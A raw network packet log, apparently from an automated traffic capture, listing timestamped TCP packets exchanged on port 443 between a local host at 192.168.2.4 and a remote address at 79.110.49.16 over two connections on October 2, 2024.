Oct 2, 2024 06:23:04.275341988 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.275369883 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.275753975 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.275768042 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.275839090 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.275839090 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.275851011 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.278855085 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.338809967 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.338835955 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.339102983 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.339129925 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.339493990 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.356336117 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.356355906 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.356964111 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.356993914 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.356996059 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.357008934 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.357024908 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.357464075 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.357475996 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.357491016 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.357496023 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.357518911 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.367808104 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.367825031 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.368669033 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.368674040 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.374531031 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.374546051 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375113964 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375133038 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375144958 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.375159979 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375173092 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.375183105 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.375737906 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375750065 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375766039 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.375768900 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.375788927 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.376669884 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.425703049 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.425719023 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.425789118 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.425817013 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.425857067 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.443192005 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.443207979 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.443281889 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.443289042 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.443330050 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.443785906 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.443800926 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.443849087 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.443852901 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.443890095 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.444391966 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.444405079 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.444444895 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.444448948 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.444492102 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.454911947 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.454926968 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.454988003 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.454993963 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.455027103 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.461474895 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.461488008 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.461540937 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.461549044 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.461577892 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.461595058 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.462050915 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.462064981 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.462100029 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.462102890 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.462132931 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.462148905 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.462727070 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.462739944 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.462786913 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.462790966 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.462843895 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.512640953 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.512656927 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.512746096 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.512765884 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.512801886 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.530236006 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.530251980 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.530312061 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.530316114 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.530349970 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.530865908 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.530879974 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.530920029 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.530922890 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.530947924 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.530963898 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.531712055 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.531724930 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.531773090 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.531776905 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.531807899 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.541871071 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.541887999 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.541928053 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.541932106 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.541980982 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.548404932 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.548418999 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.548470974 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.548475027 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.548511982 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.548958063 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.548975945 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.549021959 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.549025059 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.549058914 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.549541950 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.549555063 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.549598932 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.549602985 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.549649954 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.599706888 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.599724054 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.599764109 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.599786997 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.599800110 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.599817991 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.617278099 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.617294073 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.617327929 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.617332935 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.617355108 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.617373943 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.617904902 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.617918015 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.617949009 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.617952108 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.618017912 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.618688107 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.618701935 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.618752956 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.618757963 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.618801117 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.628799915 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.628814936 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.628850937 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.628856897 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.628882885 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.628907919 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.635401011 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.635416031 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.635451078 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.635484934 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.635494947 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.635529041 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.636054993 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.636070013 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.636107922 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.636111975 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.636133909 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.636149883 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.636537075 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.636548996 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.636581898 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.636586905 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.636610031 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.636625051 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.686625957 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.686650991 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.686693907 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.686717987 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.686736107 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.686753035 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.704277992 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.704293013 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.704341888 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.704346895 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.704391003 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.705027103 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.705041885 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.705085039 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.705089092 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.705137014 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.705703974 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.705719948 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.705768108 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.705771923 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.705804110 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.715687037 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.715703011 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.715753078 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.715769053 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.715795040 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.715810061 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.722259998 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.722279072 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.722322941 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.722347021 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.722362995 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.722381115 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.722927094 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.722939014 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.722995043 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.723004103 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.723088026 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.723539114 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.723556995 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.723603964 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.723613024 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.723653078 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.773768902 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.773785114 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.773864031 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.773890018 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.773929119 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.791301966 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.791316986 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.791373014 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.791378975 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.791416883 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.791862965 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.791877031 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.791919947 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.791924953 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.791948080 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.791964054 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.792659998 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.792675972 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.792725086 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.792728901 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.792762041 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.802736998 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.802751064 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.802809000 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.802828074 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.802850962 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.802867889 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.809185982 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.809200048 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.809257030 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.809263945 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.809295893 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.809995890 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810010910 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810044050 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.810048103 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810079098 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.810529947 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810544014 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810590982 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810590982 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.810600996 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810619116 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.810666084 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.810702085 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.811141014 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.870189905 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.870255947 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.870320082 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.870573997 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.870589972 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.488724947 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.490180969 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.490263939 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.751044035 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.751065969 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.751084089 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.752254009 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.752289057 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.752422094 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.835867882 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.835889101 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.836364031 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.836411953 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.836671114 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.837225914 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.837240934 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.838608027 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.838623047 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.838783026 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.921758890 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.921785116 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.922415972 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.922451973 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.922480106 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.922512054 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.923716068 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.923731089 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.923746109 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.923753977 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.924643040 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.924762011 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.924779892 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.924918890 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:05.924926996 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:05.973823071 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.007934093 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.007957935 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.008652925 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.008676052 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.008713007 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.008724928 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.008940935 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.008980036 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.008982897 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.009006977 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.009025097 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.010915995 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.012876987 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.012901068 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013142109 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.013150930 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013371944 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013386011 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013514042 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.013523102 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013770103 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013787031 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.013850927 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.013850927 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.013865948 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.014185905 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.014199018 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.014314890 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.014322996 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.067445993 CEST	49762	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:06.093802929 CEST	443	49762	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:06.093821049 CEST	443	49762	79.110.49.16	192.168.2.4
